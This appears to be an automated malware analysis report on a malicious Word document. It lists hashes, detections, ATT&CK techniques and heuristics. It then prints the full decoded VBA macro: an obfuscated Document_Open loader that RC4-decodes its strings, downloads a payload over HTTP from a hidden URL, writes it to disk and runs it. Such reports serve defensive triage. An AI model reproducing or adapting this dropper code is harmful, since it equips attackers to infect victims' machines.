Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a5bc92787ee7e86e…

MALICIOUS

Office (OOXML)

32.3 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-23
MD5: 6c9a38ec08da48589bf5960509457440 SHA-1: a5c97a76c711dde0f699b79a08904e83abb2ea05 SHA-256: a5bc92787ee7e86e5079e8a746917ef98657be71b1ae93aba656c9cfd4cf90b5
320 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing a VBA project with an obfuscated auto-exec loader, specifically a Document_Open macro that uses CreateObject. This indicates a malicious macro-based document designed to execute a payload. The document body explicitly instructs the user to "Enable Editing" and "Enable Content", a common social engineering tactic. The ClamAV detection name 'Doc.Malware.Chronos-6897935-0' further supports its malicious nature.

Heuristics 10

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set UEntF = CreateObject(BisGh2qsZSaI4i(HC4Eh("3CA9F308CFC8C01DAE7825024F506AB2D433546C"), "XRSkY1Qu0EO7Io"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set UEntF = CreateObject(BisGh2qsZSaI4i(HC4Eh("3CA9F308CFC8C01DAE7825024F506AB2D433546C"), "XRSkY1Qu0EO7Io"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TjWxlsut = Environ(BisGh2qsZSaI4i(HC4Eh("F38BE554FBE8BA"), "SrO1U")) & "\" & C0SFQS3rcm1O & BisGh2qsZSaI4i(HC4Eh("65F4D01F"), "LGT80oH28G6azO")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12390 bytes
SHA-256: ec4c101cd1a7471bacf85beddb76cbb6bf4e257cad85a14ca61a8b9a0d78d2bd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
95 of 184 identifiers look randomly generated (e.g. 'W7VeIIt5Ql0BstfILt5tgQkL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Function BisGh2qsZSaI4i(ByVal CLCVsW3yt As String, ByVal MzaOxGYPFT2yo As String) As String
Dim Aw3OJyAlDvIYq As Long, MyTy6oIsTsb As Long
Aw3OJyAlDvIYq = 78
MyTy6oIsTsb = 40
If Aw3OJyAlDvIYq + MyTy6oIsTsb > 2 Then
MyTy6oIsTsb = Aw3OJyAlDvIYq + 57
Else
MsgBox 58
End If
On Error Resume Next
Dim TjaNtxNNlIKKEG As Long, YZclLkYn7p2 As Long
TjaNtxNNlIKKEG = 59
YZclLkYn7p2 = 72
If TjaNtxNNlIKKEG + YZclLkYn7p2 > 2 Then
YZclLkYn7p2 = TjaNtxNNlIKKEG + 31
Else
MsgBox 82
End If
Dim X8v8JUH(0 To 255) As Integer, VDZV As Long, SBH7gOqEuH5HdgI As Long, Lgt0NOscKr0 As Long, S55EXOjWN3SP() As Byte, JqKtbyGKDngm7OAiU() As Byte, WdrrAxUSElWZCt As Byte
Dim Ev7jk1yNz As Long, Sth8xy9YZxuSVTi As Long
Ev7jk1yNz = 49
Sth8xy9YZxuSVTi = 80
If Ev7jk1yNz + Sth8xy9YZxuSVTi > 2 Then
Sth8xy9YZxuSVTi = Ev7jk1yNz + 61
Else
MsgBox 66
End If
S55EXOjWN3SP() = StrConv(MzaOxGYPFT2yo, vbFromUnicode)
Dim QpqcYrl226fM7 As Long, OKg928ht As Long
QpqcYrl226fM7 = 69
OKg928ht = 19
If QpqcYrl226fM7 + OKg928ht > 2 Then
OKg928ht = QpqcYrl226fM7 + 19
Else
MsgBox 71
End If
For VDZV = 0 To 255
X8v8JUH(VDZV) = VDZV
Next VDZV
VDZV = 0
SBH7gOqEuH5HdgI = 0
Lgt0NOscKr0 = 0
For VDZV = 0 To 255
SBH7gOqEuH5HdgI = (SBH7gOqEuH5HdgI + X8v8JUH(VDZV) + S55EXOjWN3SP(VDZV Mod Len(MzaOxGYPFT2yo))) Mod 256
WdrrAxUSElWZCt = X8v8JUH(VDZV)
X8v8JUH(VDZV) = X8v8JUH(SBH7gOqEuH5HdgI)
X8v8JUH(SBH7gOqEuH5HdgI) = WdrrAxUSElWZCt
Next VDZV
VDZV = 0
SBH7gOqEuH5HdgI = 0
Lgt0NOscKr0 = 0
JqKtbyGKDngm7OAiU() = StrConv(CLCVsW3yt, vbFromUnicode)
For VDZV = 0 To Len(CLCVsW3yt)
SBH7gOqEuH5HdgI = (SBH7gOqEuH5HdgI + 1) Mod 256
Lgt0NOscKr0 = (Lgt0NOscKr0 + X8v8JUH(SBH7gOqEuH5HdgI)) Mod 256
WdrrAxUSElWZCt = X8v8JUH(SBH7gOqEuH5HdgI)
X8v8JUH(SBH7gOqEuH5HdgI) = X8v8JUH(Lgt0NOscKr0)
X8v8JUH(Lgt0NOscKr0) = WdrrAxUSElWZCt
JqKtbyGKDngm7OAiU(VDZV) = JqKtbyGKDngm7OAiU(VDZV) Xor (X8v8JUH((X8v8JUH(SBH7gOqEuH5HdgI) + X8v8JUH(Lgt0NOscKr0)) Mod 256))
Next VDZV
Dim CIwwyCggT7nn As Long, IkcY8UId2VHs As Long
CIwwyCggT7nn = 56
IkcY8UId2VHs = 59
If CIwwyCggT7nn + IkcY8UId2VHs > 2 Then
IkcY8UId2VHs = CIwwyCggT7nn + 77
Else
MsgBox 95
End If
BisGh2qsZSaI4i = StrConv(JqKtbyGKDngm7OAiU, vbUnicode)
Dim Ey928ht As Long, DlOX6tGmePtLm As Long
Ey928ht = 57
DlOX6tGmePtLm = 2
If Ey928ht + DlOX6tGmePtLm > 2 Then
DlOX6tGmePtLm = Ey928ht + 70
Else
MsgBox 90
End If
End Function
Function C0SFQS3rcm1O() As String
Dim QGeVs6pkqomFqUzC As Long, XJ2vS1mIjFw As Long
QGeVs6pkqomFqUzC = 77
XJ2vS1mIjFw = 40
If QGeVs6pkqomFqUzC + XJ2vS1mIjFw > 2 Then
XJ2vS1mIjFw = QGeVs6pkqomFqUzC + 79
Else
MsgBox 89
End If
Dim IkOqnKKePv() As Byte, W5ZCirTxDiID() As Byte, KEhMxCpW As Long, PJmv5HFiQVJG As Long, Qsm48HB9isGh2qsZS As String, Kg9jxEn7KgKAR As String, EIM As Long
Dim XVlEwdbHQZc9 As Long, Nah As Long
XVlEwdbHQZc9 = 66
Nah = 75
If XVlEwdbHQZc9 + Nah > 2 Then
Nah = XVlEwdbHQZc9 + 47
Else
MsgBox 60
End If
EIM = 0
Dim AzXAblWSIFbZ As Long, GotofXNR As Long
AzXAblWSIFbZ = 24
GotofXNR = 27
If AzXAblWSIFbZ + GotofXNR > 2 Then
GotofXNR = AzXAblWSIFbZ + 45
Else
MsgBox 90
End If
YT0ph65PeZL5eil:
Dim JaYPh As Long, PgJTFpK5Nedf As Long
JaYPh = 82
PgJTFpK5Nedf = 6
If JaYPh + PgJTFpK5Nedf > 2 Then
PgJTFpK5Nedf = JaYPh + 34
Else
MsgBox 97
End If
Randomize
Kg9jxEn7KgKAR = Int(30 * Rnd)
If Kg9jxEn7KgKAR < 4 Then GoTo YT0ph65PeZL5eil
EIM = Kg9jxEn7KgKAR
If EIM > 0& Then
Dim Y5OpqZvRWPgnay1r As Long, XZnzXAblWSI As Long
Y5OpqZvRWPgnay1r = 1
XZnzXAblWSI = 50
If Y5OpqZvRWPgnay1r + XZnzXAblWSI > 2 Then
XZnzXAblWSI = Y5OpqZvRWPgnay1r + 50
Else
MsgBox 3
End If
Qsm48HB9isGh2qsZS = BisGh2qsZSaI4i(HC4Eh("007B6E66BF9A5183A73C"), "O8yKbvLXKLok4D")
Randomize
IkOqnKKePv = Qsm48HB9isGh2qsZS
KEhMxCpW = Len(Qsm48HB9isGh2qsZS) - 1&
EIM = (EIM * 2&) - 1&
ReDim W5ZCirTxDiID(EIM) As Byte
Dim Gux1bV As Long, LonguECPh As Long
Gux1bV = 82
LonguECPh = 52
If Gux1bV + LonguECPh > 2 Then
LonguECPh = Gux1bV + 43
Else
MsgBox 22
End If
For PJmv5HFiQVJG = 0& To EIM Step 2&
W5ZCirTxDiID(PJmv5HFiQVJG) = IkOqnKKePv(CLng(KEhMxCpW * Rnd) * 2&)
Next
Dim RLK5wSqSooX As Long, Q3k6D3KgMJxA2A2 As Long
RLK5wSqSooX = 87
Q3k6D3KgMJxA2A2 = 90
If RLK5wSqSooX + Q3k6D3KgMJxA2A2 > 2 Then
Q3k6D3KgMJxA2A2 = RLK5wSqSooX + 9
Else
MsgBox 27
End If
End If
Dim Kiv1eQnKgMJxA2A2 As Long, VnupQRCjB As Long
Kiv1eQnKgMJxA2A2 = 45
VnupQRCjB = 62
If Kiv1eQnKgMJxA2A2 + VnupQRCjB > 2 Then
VnupQRCjB = Kiv1eQnKgMJxA2A2 + 64
Else
MsgBox 60
End If
C0SFQS3rcm1O = W5ZCirTxDiID
Dim WFBGT5OKR As Long, Iamv9aQEjfVY As Long
WFBGT5OKR = 17
Iamv9aQEjfVY = 49
If WFBGT5OKR + Iamv9aQEjfVY > 2 Then
Iamv9aQEjfVY = WFBGT5OKR + 77
Else
MsgBox 19
End If
End Function
Sub VVPFG1308C2spDIWn(RtRw0 As Long)
Dim FgBKi1HzznODsi As Long, Sx1bVnupQ As Long
FgBKi1HzznODsi = 29
Sx1bVnupQ = 39
If FgBKi1HzznODsi + Sx1bVnupQ > 2 Then
Sx1bVnupQ = FgBKi1HzznODsi + 10
Else
MsgBox 96
End If
Dim BubaBeerHmG5Yai As Long
Dim XFz9iPa As Long, Hgn2dId6 As Long
XFz9iPa = 8
Hgn2dId6 = 53
If XFz9iPa + Hgn2dId6 > 2 Then
Hgn2dId6 = XFz9iPa + 65
Else
MsgBox 79
End If
BubaBeerHmG5Yai = Timer + RtRw0
Do While Timer < BubaBeerHmG5Yai
DoEvents
Loop
Dim X3GpAHbh As Long, LSSA55sOa As Long
X3GpAHbh = 28
LSSA55sOa = 91
If X3GpAHbh + LSSA55sOa > 2 Then
LSSA55sOa = X3GpAHbh + 48
Else
MsgBox 78
End If
End Sub
Sub Document_Open()
Dim IgZu87nNEETIb0jy As Long, ABk2pCGcv5mul As Long
IgZu87nNEETIb0jy = 72
ABk2pCGcv5mul = 60
If IgZu87nNEETIb0jy + ABk2pCGcv5mul > 2 Then
ABk2pCGcv5mul = IgZu87nNEETIb0jy + 95
Else
MsgBox 89
End If
Dim MAS5R3C4xPbd As Long, IoPomHjvlGg As Long, XTgiXBJhRsNOxn As Long
Dim FSE2FuWYk28 As Long, K6rIFQhggSk As Long
FSE2FuWYk28 = 9
K6rIFQhggSk = 97
If FSE2FuWYk28 + K6rIFQhggSk > 2 Then
K6rIFQhggSk = FSE2FuWYk28 + 32
Else
MsgBox 27
End If
MAS5R3C4xPbd = 989218552: IoPomHjvlGg = 0: XTgiXBJhRsNOxn = 0
Dim Yb6W6D4sT3x As Long, DWnGEfxAXwjAIL As Long
Yb6W6D4sT3x = 49
DWnGEfxAXwjAIL = 3
If Yb6W6D4sT3x + DWnGEfxAXwjAIL > 2 Then
DWnGEfxAXwjAIL = Yb6W6D4sT3x + 41
Else
MsgBox 1
End If
For IoPomHjvlGg = 1 To MAS5R3C4xPbd
XTgiXBJhRsNOxn = XTgiXBJhRsNOxn + 1
Next IoPomHjvlGg
Dim Cgt1IgIo7tTK1 As Long, SDERiA9zLtxK As Long
Cgt1IgIo7tTK1 = 57
SDERiA9zLtxK = 77
If Cgt1IgIo7tTK1 + SDERiA9zLtxK > 2 Then
SDERiA9zLtxK = Cgt1IgIo7tTK1 + 44
Else
MsgBox 44
End If
If XTgiXBJhRsNOxn = MAS5R3C4xPbd Then
Dim Gko0yKjP As Long, M89edfLoAL4 As Long
Gko0yKjP = 35
M89edfLoAL4 = 45
If Gko0yKjP + M89edfLoAL4 > 2 Then
M89edfLoAL4 = Gko0yKjP + 16
Else
MsgBox 3
End If
O8jUS6vnxz
Dim IahFtJOsViR8hTKCW As Long, EiBSYiGOD4G As Long
IahFtJOsViR8hTKCW = 84
EiBSYiGOD4G = 22
If IahFtJOsViR8hTKCW + EiBSYiGOD4G > 2 Then
EiBSYiGOD4G = IahFtJOsViR8hTKCW + 11
Else
MsgBox 90
End If
Else
Dim RffSSCRUQ As Long, CfnbRB As Long
RffSSCRUQ = 39
CfnbRB = 59
If RffSSCRUQ + CfnbRB > 2 Then
CfnbRB = RffSSCRUQ + 26
Else
MsgBox 25
End If
JIi6zJoXxJ4FUx
Dim Xx9SKz55xm9xRTw9RYt As Long, DyDGRwZfB8KiEp0D As Long
Xx9SKz55xm9xRTw9RYt = 89
DyDGRwZfB8KiEp0D = 7
If Xx9SKz55xm9xRTw9RYt + DyDGRwZfB8KiEp0D > 2 Then
DyDGRwZfB8KiEp0D = Xx9SKz55xm9xRTw9RYt + 30
Else
MsgBox 84
End If
End If
Dim Mevly2IQnZyFyL As Long, I8zuLOOSQ As Long
Mevly2IQnZyFyL = 26
I8zuLOOSQ = 25
If Mevly2IQnZyFyL + I8zuLOOSQ > 2 Then
I8zuLOOSQ = Mevly2IQnZyFyL + 1
Else
MsgBox 74
End If
End Sub
Sub O8jUS6vnxz()
Dim YD5dfzOx As Long, HgXJOd2EF As Long
YD5dfzOx = 55
HgXJOd2EF = 11
If YD5dfzOx + HgXJOd2EF > 2 Then
HgXJOd2EF = YD5dfzOx + 70
Else
MsgBox 39
End If
Dim TjWxlsut As String, UEntF As Object, BtkO As Integer
Dim N2MOWdWwO0j As Long, MOBZvxC As Long
N2MOWdWwO0j = 27
MOBZvxC = 22
If N2MOWdWwO0j + MOBZvxC > 2 Then
MOBZvxC = N2MOWdWwO0j + 10
Else
MsgBox 45
End If
TjWxlsut = Environ(BisGh2qsZSaI4i(HC4Eh("F38BE554FBE8BA"), "SrO1U")) & "\" & C0SFQS3rcm1O & BisGh2qsZSaI4i(HC4Eh("65F4D01F"), "LGT80oH28G6azO")
Dim XLiQIh As Long, EaGCChvXnXF As Long
XLiQIh = 91
EaGCChvXnXF = 25
If XLiQIh + EaGCChvXnXF > 2 Then
EaGCChvXnXF = XLiQIh + 98
Else
MsgBox 6
End If
Set UEntF = CreateObject(BisGh2qsZSaI4i(HC4Eh("3CA9F308CFC8C01DAE7825024F506AB2D433546C"), "XRSkY1Qu0EO7Io"))
Dim Gc0u96uQAA62 As Long, Sbul0 As Long
Gc0u96uQAA62 = 79
Sbul0 = 15
If Gc0u96uQAA62 + Sbul0 > 2 Then
Sbul0 = Gc0u96uQAA62 + 82
Else
MsgBox 26
End If
UEntF.Open BisGh2qsZSaI4i(HC4Eh("ADF9E9"), "TJAVWNEr5wffS"), BisGh2qsZSaI4i(HC4Eh("2DDE020F7B5A22E13AA25B42980F6E15900272F5F4EA62C42BAD"), "Y9CsyAOl8HLyT0"), False
Dim W7VeIIt5Ql0BstfILt5tgQkL As Long, WJExnuh49CcbbhJB As Long
W7VeIIt5Ql0BstfILt5tgQkL = 63
WJExnuh49CcbbhJB = 38
If W7VeIIt5Ql0BstfILt5tgQkL + WJExnuh49CcbbhJB > 2 Then
WJExnuh49CcbbhJB = W7VeIIt5Ql0BstfILt5tgQkL + 12
Else
MsgBox 64
End If
UEntF.setRequestHeader BisGh2qsZSaI4i(HC4Eh("3094D20C526AD8C4A42C"), "OKwIQnZyFyL"), BisGh2qsZSaI4i(HC4Eh("07031A21E79693635F4C2E"), "Ko1W3OxLfD9")
UEntF.send
If UEntF.Status = 200 Then
Dim X9MV4QnJ As Long, Wxd1Z As Long
X9MV4QnJ = 29
Wxd1Z = 41
If X9MV4QnJ + Wxd1Z > 2 Then
Wxd1Z = X9MV4QnJ + 77
Else
MsgBox 93
End If
BtkO = FreeFile
Open TjWxlsut For Binary Access Write Lock Write As #BtkO
Put #BtkO, , BisGh2qsZSaI4i(StrConv(UEntF.ResponseBody, vbUnicode), BisGh2qsZSaI4i(HC4Eh("B31BB3295C8CEB02B4"), "LIKoQo"))
Close #BtkO
Dim NiXRELM3UpHAmFN As Long, TdQUv8NUmUNW As Long
NiXRELM3UpHAmFN = 32
TdQUv8NUmUNW = 31
If NiXRELM3UpHAmFN + TdQUv8NUmUNW > 2 Then
TdQUv8NUmUNW = NiXRELM3UpHAmFN + 7
Else
MsgBox 80
End If
VVPFG1308C2spDIWn 1
Dim DhskpMx As Long, Ht4FYWcJVV As Long
DhskpMx = 93
Ht4FYWcJVV = 49
If DhskpMx + Ht4FYWcJVV > 2 Then
Ht4FYWcJVV = DhskpMx + 9
Else
MsgBox 78
End If
CreateObject(BisGh2qsZSaI4i(HC4Eh("72A35343258EBB027022F2EC9B"), "EKo0qpqY20IW")).Run """" & TjWxlsut & """"
Dim GVHU As Long, PIPIlv As Long
GVHU = 76
PIPIlv = 76
If GVHU + PIPIlv > 2 Then
PIPIlv = GVHU + 29
Else
MsgBox 45
End If
End If
Dim UG8inCV As Long, GvtUO0xjBrviph As Long
UG8inCV = 86
GvtUO0xjBrviph = 96
If UG8inCV + GvtUO0xjBrviph > 2 Then
GvtUO0xjBrviph = UG8inCV + 67
Else
MsgBox 54
End If
Set UEntF = Nothing
Dim OoO7WgL3f6 As Long, W8UfMpFAk6r7wDmpd As Long
OoO7WgL3f6 = 32
W8UfMpFAk6r7wDmpd = 8
If OoO7WgL3f6 + W8UfMpFAk6r7wDmpd > 2 Then
W8UfMpFAk6r7wDmpd = OoO7WgL3f6 + 8
Else
MsgBox 60
End If
End Sub
Sub JIi6zJoXxJ4FUx()
Dim ILB4LXq As Long, VZOXHoYG As Long
ILB4LXq = 29
VZOXHoYG = 17
If ILB4LXq + VZOXHoYG > 2 Then
VZOXHoYG = ILB4LXq + 52
Else
MsgBox 47
End If
LOF 19
If CDate(74) = True Then TObfXnLxh = 8210
ChDir 29
DateSerial 69, 95, 71
GetSetting 45, 96, 40
Iw8sFmuEJPo = EOF(38)
L9q5ZQK4yXwj = CVErr(91)
LoadPicture 56, 89, 62, 70, 20
AppActivate 70
DoEvents
DateAdd "MRQ3g", 92, 80
If CByte(16) = True Then G5byjhGK5 = 1054
Loc 95
TimeSerial 43, 28, 21
TimeValue 43
Switch 75
GPM5Nqt6HX = LCase(4)
Stop
GetAllSettings 45, 22
Hnx1mlVul5w = CurDir
FV 40, 85, 75
FreeFile 32
Rate 35, 97, 37
Year 47
Partition 63, 42, 4, 21
BzqIvVDfm = CStr(22)
DeleteSetting "BFaaH0VR1HwM"
If CBool(19) = True Then KlPRblWBjELLi = 28
Month 72
HZuGrM5 = QBColor(85)
Dim V2ue4kzqbxbDiQ6PQ As Long, GJHeAk As Long
V2ue4kzqbxbDiQ6PQ = 27
GJHeAk = 51
If V2ue4kzqbxbDiQ6PQ + GJHeAk > 2 Then
GJHeAk = V2ue4kzqbxbDiQ6PQ + 5
Else
MsgBox 43
End If
End Sub
Function HC4Eh(MMBN9ASIg As String) As String
Dim Rxai9aZnaw As Long, OOObBva2nq As Long
Rxai9aZnaw = 21
OOObBva2nq = 94
If Rxai9aZnaw + OOObBva2nq > 2 Then
OOObBva2nq = Rxai9aZnaw + 47
Else
MsgBox 90
End If
Dim VbGuVpS0UMsm48HB9 As Integer
Dim TK1L7otYaw9d4S As Long, YA3jZXjVOWURAe As Long
TK1L7otYaw9d4S = 96
YA3jZXjVOWURAe = 16
If TK1L7otYaw9d4S + YA3jZXjVOWURAe > 2 Then
YA3jZXjVOWURAe = TK1L7otYaw9d4S + 83
Else
MsgBox 82
End If
For VbGuVpS0UMsm48HB9 = 1 To Len(MMBN9ASIg) Step 2
HC4Eh = HC4Eh & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(MMBN9ASIg, VbGuVpS0UMsm48HB9, 2)))
Next
Dim I5ABva2nq As Long, RKGUxUhZjOCfIz As Long
I5ABva2nq = 66
RKGUxUhZjOCfIz = 60
If I5ABva2nq + RKGUxUhZjOCfIz > 2 Then
RKGUxUhZjOCfIz = I5ABva2nq + 4
Else
MsgBox 46
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 33280 bytes
SHA-256: dab859642ecfd89cc1bf14485454bfd0ecc91139c73bc6d271879d8d1aef2a47
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.